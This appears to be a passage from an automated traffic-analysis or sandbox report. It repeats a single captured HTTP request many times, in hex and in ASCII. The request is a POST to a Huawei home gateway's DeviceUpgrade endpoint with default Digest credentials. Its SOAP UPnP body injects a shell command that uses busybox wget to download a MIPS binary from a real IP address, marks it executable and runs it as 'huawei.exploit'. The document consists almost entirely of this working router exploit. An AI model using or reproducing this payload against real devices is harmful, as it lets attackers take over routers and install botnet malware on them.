72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 